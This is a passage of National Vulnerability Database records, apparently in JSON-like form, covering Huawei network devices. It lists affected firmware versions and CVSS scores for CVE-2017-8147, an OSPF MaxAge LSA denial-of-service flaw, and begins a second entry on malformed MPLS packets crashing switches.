                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v100r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "F0ECAC9C-B545-4DA7-9DC7-6B661B3465BC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5B7B7285-F4C6-415C-A948-D7612750A77D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r001c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "9CD40F46-5E04-43F0-A2DB-0ACBEC92C53F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "4D6DC0AF-017E-41BC-A19D-F9AA055F5224",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "749B68B9-9F62-4E7A-AC86-F4073BA32E18",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r003c02:*:*:*:*:*:*:*",
                     matchCriteriaId: "9DD08A9D-8391-4F67-A61B-D80950079CE8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r003c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "BDC63F52-B7FE-4F43-9A70-ECB2D3621195",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "F18D9776-5CE7-4DD3-9119-7FB08A35B955",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "9FD4718F-473A-490E-8DFC-6A09FECDDD90",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FF4AF711-D921-4261-A459-2A0780EA951F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "8DA5CF67-A58B-4666-B87E-712507233453",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA7AC10D-B0DD-4206-8642-134DDD585C06",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v100r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "C306E48F-EE09-4C7D-9084-484245A1A9F4",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v100r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D8061AC8-1A89-4D3D-A95A-305EE65900A7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "F49D3EAD-1EB3-4C62-80BA-4C9C3CE0408C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r001c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "65902ABB-3EF2-4C8B-BAC1-84BC585019BA",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1D75B012-A57D-4C6D-AB26-51D2ECC02F35",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "B1DFF0C0-AA17-4AA1-A418-4759D1A58852",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D84F05D5-BA7D-485B-91C2-273349335CFB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "EF3FB3CC-2EAC-4A08-BDDC-DCACEE9FA2AE",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "2377CD30-6F57-46CB-9DD1-E29458A7D928",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1D79CD09-3414-4105-AD59-F3D1BAC61B7E",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "8769C2C4-E333-432B-8943-CFDFAE013379",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v100r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "4E180AC6-B8CA-4733-82A1-8BA7D0B0B683",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v100r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "937381A6-259E-4FC3-837D-686ECCB4957F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v100r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "6A1C2351-2403-4259-9113-031DD4AE39BB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v100r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "6E38DC13-7D02-4C04-9569-FC6365A06F8B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "E8F37BC5-3B25-4E30-A1CA-5ACFA46119B5",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "EC83D96A-728C-40C1-97F5-BE079A39D724",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "473B6E52-E60F-4D3C-9028-E362DF2A8327",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "2632DC1D-0CB9-4493-9270-436139C88623",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "BC8AE44D-1924-4C01-B4B9-CC5BF485A3EB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "886E9D1F-25FA-41FA-A64B-E42B9910D2B3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "0E7DB9D3-BB34-49BE-8302-A054D79FE8D6",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r008c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "0ACAD052-796D-428E-95B1-65099952B773",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AD2EC926-50C6-4CBE-BB6F-56F3A6287DEE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "2B1F0B3D-1923-42C3-A3DB-03D11BE059D9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "4FB6ED15-477B-4BB5-AA94-0D7897FBD962",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "06AD9ACA-E0C3-4096-BE50-94E717CDA318",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "325D6523-A07A-48D4-AD44-CF838BD77432",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "6AC7E622-010C-4C5D-8AA6-D4793AFCE0E0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D78DAB13-32AA-4813-AB0A-0EA870F41183",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "36AB80F7-1BD2-4169-AC70-708CE84BB15C",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "75FAA4BF-1ED0-4059-ADA1-071AF1BF2882",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:secospace_usg6600_firmware:v500r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "E990766D-FBD4-404E-A783-3D2D0BC210F3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:secospace_usg6600_firmware:v500r001c20:*:*:*:*:*:*:*",
                     matchCriteriaId: "A638ACAF-9A6F-4861-8CDB-E43FBC3C9C5B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:secospace_usg6600_firmware:v500r001c30:*:*:*:*:*:*:*",
                     matchCriteriaId: "ADB7FBB2-1CC6-4DA3-85AB-66562B0A9198",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:secospace_usg6600:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "BE469876-F873-4705-9760-097AE840A818",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "AC6005 V200R006C10SPC200,AC6605 V200R006C10SPC200,AR1200 with software V200R005C10CP0582T, V200R005C10HP0581T, V200R005C20SPC026T,AR200 with software V200R005C20SPC026T,AR3200 V200R005C20SPC026T,CloudEngine 12800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 5800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 6800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 7800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 8800 with software V100R006C00, V200R001C00,E600 V200R008C00,S12700 with software V200R005C00, V200R006C00, V200R007C00, V200R008C00,S1700 with software V100R006C00, V100R007C00, V200R006C00,S2300 with software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S2700 with software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S5300 with software V100R005C00, V100R006C00, V100R006C01, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S5700 with software V100R005C00, V100R006C00, V100R006C01, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S6300 with software V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R008C00,S6700 with software V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S7700 with software V100R003C00, V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S9300 with software V100R001C00, V100R002C00, V100R003C00, V100R006C00, V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R008C10,S9700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00,Secospace USG6600 V500R001C00SPC050 have a MaxAge LSA vulnerability due to improper OSPF implementation. When the device receives special LSA packets, the LS (Link Status) age would be set to MaxAge, 3600 seconds. An attacker can exploit this vulnerability to poison the route table and launch a DoS attack.",
      },
      {
         lang: "es",
         value: "AC6005 V200R006C10SPC200,AC6605 V200R006C10SPC200,AR1200 con software V200R005C10CP0582T, V200R005C10HP0581T, V200R005C20SPC026T,AR200 con software V200R005C20SPC026T,AR3200 V200R005C20SPC026T,CloudEngine 12800 con software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 5800 con software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 6800 con software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 7800 con software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 8800 con software V100R006C00, V200R001C00,E600 V200R008C00,S12700 con software V200R005C00, V200R006C00, V200R007C00, V200R008C00,S1700 con software V100R006C00, V100R007C00, V200R006C00,S2300 con software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S2700 con software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S5300 con software V100R005C00, V100R006C00, V100R006C01, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S5700 con software V100R005C00, V100R006C00, V100R006C01, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S6300 con software V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R008C00,S6700 con software V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S7700 con software V100R003C00, V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S9300 con software V100R001C00, V100R002C00, V100R003C00, V100R006C00, V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R008C10,S9700 con software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00 y Secospace USG6600 V500R001C00SPC050 tienen una vulnerabilidad MaxAge LSA debido a una implementación OSPF incorrecta. Cuando el dispositivo recibe paquetes LSA especiales, la propiedad age del LS (Link Status) sería igual al de MaxAge, 3600 segundos. Un atacante podría explotar esta vulnerabilidad para envenenar la tabla de rutas y lanzar un ataque de denegación de servicio (Dos).",
      },
   ],
   id: "CVE-2017-8147",
   lastModified: "2024-11-21T03:33:24.850",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "PARTIAL",
               baseScore: 5,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 2.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV30: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 7.5,
               baseSeverity: "HIGH",
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
               version: "3.0",
            },
            exploitabilityScore: 3.9,
            impactScore: 3.6,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2017-11-22T19:29:03.257",
   references: [
      {
         source: "psirt@huawei.com",
         tags: [
            "Issue Tracking",
            "Mitigation",
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170720-01-ospf-en",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Issue Tracking",
            "Mitigation",
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170720-01-ospf-en",
      },
   ],
   sourceIdentifier: "psirt@huawei.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-20",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2017-04-02 20:59
Modified
2024-11-21 03:00
Summary
Huawei S5300 with software V200R003C00, V200R007C00, V200R008C00, V200R009C00; S5700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R005C03, V200R007C00, V200R008C00, V200R009C00; S6300 with software V200R003C00, V200R005C00, V200R008C00, V200R009C00; S6700 with software V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R008C00, V200R009C00; S7700 with software V200R007C00, V200R008C00, V200R009C00; S9300 with software V200R007C00, V200R008C00, V200R009C00; S9700 with software V200R007C00, V200R008C00, V200R009C00; and S12700 with software V200R007C00, V200R007C01, V200R008C00, V200R009C00 allow the attacker to cause a denial of service condition by sending malformed MPLS packets.
Impacted products
Vendor Product Version
huawei s12700_firmware v200r007c00
huawei s12700_firmware v200r007c01
huawei s12700_firmware v200r008c00
huawei s12700_firmware v200r009c00
huawei s12700 -
huawei s5300_firmware v200r003c00
huawei s5300_firmware v200r007c00
huawei s5300_firmware v200r008c00
huawei s5300_firmware v200r009c00
huawei s5300 -
huawei s5700_firmware v200r001c00
huawei s5700_firmware v200r002c00
huawei s5700_firmware v200r003c00
huawei s5700_firmware v200r005c00
huawei s5700_firmware v200r005c03
huawei s5700_firmware v200r007c00
huawei s5700_firmware v200r008c00
huawei s5700_firmware v200r009c00
huawei s5700 -
huawei s6300_firmware v200r003c00
huawei s6300_firmware v200r005c00
huawei s6300_firmware v200r008c00
huawei s6300_firmware v200r009c00
huawei s6300 -
huawei s6700_firmware v200r001c00
huawei s6700_firmware v200r001c01
huawei s6700_firmware v200r002c00
huawei s6700_firmware v200r003c00
huawei s6700_firmware v200r005c00
huawei s6700_firmware v200r007c00
huawei s6700_firmware v200r008c00
huawei s6700_firmware v200r009c00
huawei s6700 -
huawei s7700_firmware v200r007c00
huawei s7700_firmware v200r008c00
huawei s7700_firmware v200r009c00
huawei s7700 -
huawei s9300_firmware v200r007c00
huawei s9300_firmware v200r008c00
huawei s9300_firmware v200r009c00
huawei s9300 -
huawei s9700_firmware v200r007c00
huawei s9700_firmware v200r008c00
huawei s9700_firmware v200r009c00
huawei s9700 -



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "10CBC93B-5CF6-45BF-A90A-84B7693E27FD",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r007c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "AC4803A7-44B2-41BA-814D-151239B92CEF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "BD4C5CC9-FD60-4C64-8F88-CFC71BBEA663",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r009c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "B17A34EF-677D-4264-82FB-F7F582C9F56B",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s12700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "138C1E57-176C-46B1-9704-D9C8391CC802",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD601FFF-E623-4ADC-B286-D11B8004D7CF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD6B13D4-07F3-4CB5-8194-89781E685A78",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5454BC21-A04F-4B3D-8533-2414B6E1BC8C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r009c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "7F31814D-5879-4FB9-BDAE-01CFC75D9AF4",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CFEF08E-54C5-4D60-AFF0-37B00D6E2DDD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "336AA440-AEF4-482B-A037-8976DC38BA1A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "3B2DE9FE-5EC9-462E-86F0-EE772C944DFC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "4907FBB8-5157-460D-9240-DD7D610C0FCC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "DCF23DAE-1215-41B2-88C5-4436D846266C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r005c03:*:*:*:*:*:*:*",
                     matchCriteriaId: "5B18ABC1-A970-472A-A8BF-934D1180930E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "40745A01-E5AC-4207-A34F-D8E7F7231F83",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "21FFF548-FBEF-468A-A8DE-1DB1B7C0B3AF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r009c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "48B5A9B7-A931-4806-8AC7-302C6CA49CF1",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "E22D3CFF-3353-4EE2-8933-84F395469D0D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5C330A14-C941-4B28-AA9C-B78A96A9011D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "C6818ECD-730B-40D6-9108-B8540CC4BF1E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "939C73D9-E0E9-47A5-970E-6C84F5ECD2D7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r009c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "B39BBA0F-8EB9-40BA-B8DF-5C735F2216A3",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AA3C8988-A1FC-4B04-9134-F2BDDADEAFB5",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5B7B7285-F4C6-415C-A948-D7612750A77D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r001c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "9CD40F46-5E04-43F0-A2DB-0ACBEC92C53F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "4D6DC0AF-017E-41BC-A19D-F9AA055F5224",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "749B68B9-9F62-4E7A-AC86-F4073BA32E18",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "F18D9776-5CE7-4DD3-9119-7FB08A35B955",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FF4AF711-D921-4261-A459-2A0780EA951F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "8DA5CF67-A58B-4666-B87E-712507233453",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r009c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "A9EA93B5-01A5-4506-9B0A-993621E6940E",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA7AC10D-B0DD-4206-8642-134DDD585C06",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "2377CD30-6F57-46CB-9DD1-E29458A7D928",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1D79CD09-3414-4105-AD59-F3D1BAC61B7E",
                     vulnerable: true,
                  },
                  {
